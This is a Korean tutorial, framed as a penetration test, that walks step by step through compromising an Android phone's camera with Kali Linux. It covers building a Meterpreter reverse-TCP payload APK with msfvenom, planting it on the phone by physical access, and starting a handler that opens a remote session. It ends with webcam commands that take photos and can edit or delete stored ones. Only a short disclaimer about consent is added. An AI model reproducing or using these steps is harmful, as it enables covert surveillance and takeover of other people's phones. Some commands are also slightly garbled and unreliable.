Computer >> 컴퓨터 >  >> 시스템 >> Linux

Kali Linux로 안드로이드 폰 카메라 취약점 진단하기: 침투 테스트 완벽 가이드

Kali Linux로 안드로이드 폰 카메라 취약점 진단하기: 침투 테스트 완벽 가이드

해커가 안드로이드 폰의 카메라를 해킹해 사용자를 몰래 감시하거나 가짜 이미지를 전송한다는 뉴스가 여러 차례 보도된 바 있습니다. 경각심 있는 스마트폰 사용자라면 이러한 위협이 실제로 얼마나 현실적인지, 그 위험도는 어느 정도인지 직접 점검해 보고 싶으실 겁니다.

Kali Linux는 침투 테스트(penetration test)를 통해 안드로이드 폰 카메라의 잠재적 취약점을 확인할 수 있는 최고의 도구 중 하나입니다. 이를 활용하면 해커가 원격으로 폰 카메라에 접근하려는 시도를 미리 파악하고 대비할 수 있습니다.

익스플로잇 페이로드 설치하기

Kali Linux로 침투 테스트를 진행하려면 먼저 공식 사이트에서 Kali Linux를 다운로드합니다. 이번 실습에서 사용할 "msfvenom", "msfconsole", "meterpreter" 등 각종 용어의 정의는 이전 튜토리얼을 참고하시기 바랍니다.

침투 테스트의 첫 단계는 대상 기기에 표준 익스플로잇 페이로드를 설치하는 것입니다. Kali Linux 터미널을 열고 다음 명령어를 입력합니다: ifconfig. 이 명령은 현재 Kali Linux 세션의 IP 주소를 알려줍니다.

Kali Linux로 안드로이드 폰 카메라 취약점 진단하기: 침투 테스트 완벽 가이드

이제 위에서 확인한 IP 주소를 사용해 아래 명령어를 입력합니다. 익스플로잇, 트로이 목마 등의 취약점 공격에 사용되는 포트 번호는 일반적으로 4444로 지정됩니다.

msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > Payload.apk

이 단계에서는 자바 인터프리터 기반의 메타스플로잇(Metasploit) 페이로드를 주입합니다. 성공하면 침투 테스트를 통해 해당 폰이 통화 도청, SMS 접근, 사용자 위치 추적 등에 취약한지 검증할 수 있습니다.

여기서는 이 익스플로잇이 폰의 카메라에 어떻게 접근할 수 있는지 보여주는 데 초점을 맞춥니다.

Kali Linux로 안드로이드 폰 카메라 취약점 진단하기: 침투 테스트 완벽 가이드

익스플로잇이 생성되면 "Payload"라는 이름의 APK 파일이 루트 폴더에 만들어집니다. 이 파일을 대상 안드로이드 폰에 설치해야 하는데, 말처럼 쉽지는 않습니다. 대부분의 최신 안드로이드 폰과 이메일 서비스는 이런 악성코드에 감염된 파일을 거부하는데, 이는 다행스러운 일입니다.

그럼에도 USB 케이블이나 임시 파일을 통해서는 전달이 가능합니다. 해커가 폰에 몇 분이라도 물리적으로 접근할 수 있다면 상당히 취약해질 수 있습니다. 이번 침투 테스트의 목표는 바로 이 위험이 정확히 어느 정도인지 파악하는 것입니다.

Kali Linux로 안드로이드 폰 카메라 취약점 진단하기: 침투 테스트 완벽 가이드

파일이 전송되면 폰에 페이로드를 설치할 방법을 찾아야 합니다. 아주 오래된 안드로이드 버전이 아니라면 APK 설치 전에 여러 경고 메시지가 표시됩니다. 그럼에도 불구하고 안드로이드 버전과 무관하게 출처 불명의 앱을 설치하는 우회 방법은 여전히 많이 존재합니다.

Kali Linux로 안드로이드 폰 카메라 취약점 진단하기: 침투 테스트 완벽 가이드

익스플로잇 실행하기

위에서 만든 Payload 익스플로잇을 실행하려면 msfconsole 명령어를 입력합니다. 명령 실행은 몇 초밖에 걸리지 않으며, 곧 폰 카메라에 대한 추가 침투 테스트를 위해 메타스플로잇이 준비됩니다.

Kali Linux로 안드로이드 폰 카메라 취약점 진단하기: 침투 테스트 완벽 가이드

메타스플로잇은 자체적인 상세 정보를 출력하며, 페이로드 요약도 함께 표시됩니다. 여기에는 작동 중인 익스플로잇의 개수가 나타납니다.

Kali Linux로 안드로이드 폰 카메라 취약점 진단하기: 침투 테스트 완벽 가이드

다음 단계에서 msfconsole이 익스플로잇을 실행할 준비를 마칩니다. 앞서 확인한 IP 주소와 포트 번호(4444)를 참고하여 아래 명령어를 순서대로 입력합니다:

exploit (multi/handler) > set LHOST "IP Address" [ENTER]
set LPORT "Port number" [ENTER]
exploit [ENTER]
Kali Linux로 안드로이드 폰 카메라 취약점 진단하기: 침투 테스트 완벽 가이드

역방향 TCP 핸들러(reverse TCP handler)가 활성화되면 Meterpreter가 실행되는 여러 단계가 화면에 표시됩니다. 대상 폰을 진단하는 동안 잠시 기다립니다.

여기서 짚고 넘어갈 점은, 대부분의 최신 안드로이드 폰은 이러한 접근을 계속해서 차단한다는 것입니다. 이것은 어디까지나 침투 테스트입니다. 만약 이 강력한 APK 파일로도 폰이 뚫리지 않는다면, 제조사가 이 공격 벡터를 이미 인지하고 대비하고 있다는 의미입니다.

Kali Linux로 안드로이드 폰 카메라 취약점 진단하기: 침투 테스트 완벽 가이드

안드로이드 폰 카메라 접근하기

폰에 익스플로잇을 성공적으로 삽입했다면, 이제 침투가 가능한 상태일 수 있습니다. 이 경우 Kali Linux 터미널의 "meterpreter"가 폰과 연결을 설정합니다. 이 시점에서 help를 입력하면 공격 대상 안드로이드 폰 내부의 다양한 옵션에 접근할 수 있습니다.

Kali Linux로 안드로이드 폰 카메라 취약점 진단하기: 침투 테스트 완벽 가이드

help 메뉴에서 아래 명령어를 입력하면 폰의 카메라에 접근할 수 있습니다. 이번 익스플로잇에서는 후면 카메라에 접근해 터미널에서 사진을 촬영하는 것을 시도했습니다.

webcam_list [ENTER]
1. Back camera
2. Front camera [ENTER]
webcam_stream -i 1

침투 테스트를 성공적으로 마치려면, 카메라에 접근한 뒤 사진을 촬영해 Kali Linux 루트 폴더에 저장합니다. 저장된 다른 사진들을 편집, 이름 변경 또는 삭제할 수도 있습니다. 따라서 테스트한 폰에서 침투가 성공했다면, 실제 공격이 발생할 가능성을 알리는 경고 신호이며, 즉시 보안 패치를 적용해야 할 때라는 뜻입니다.

Kali Linux로 안드로이드 폰 카메라 취약점 진단하기: 침투 테스트 완벽 가이드

이번 튜토리얼에서는 Kali Linux 터미널에서 침투 테스트를 위해 안드로이드 카메라에 접근하는 방법을 살펴보았습니다.

본 글은 보안 연구 목적의 글입니다. 타인의 카메라에 접근해 시연할 경우 반드시 사전에 허락을 받아야 하며, 물론 본인의 폰이라면 예외입니다. 자신의 폰의 취약점을 테스트하고 발견하는 데 도움이 되는 안드로이드용 해킹 앱들도 함께 확인해 보시기 바랍니다.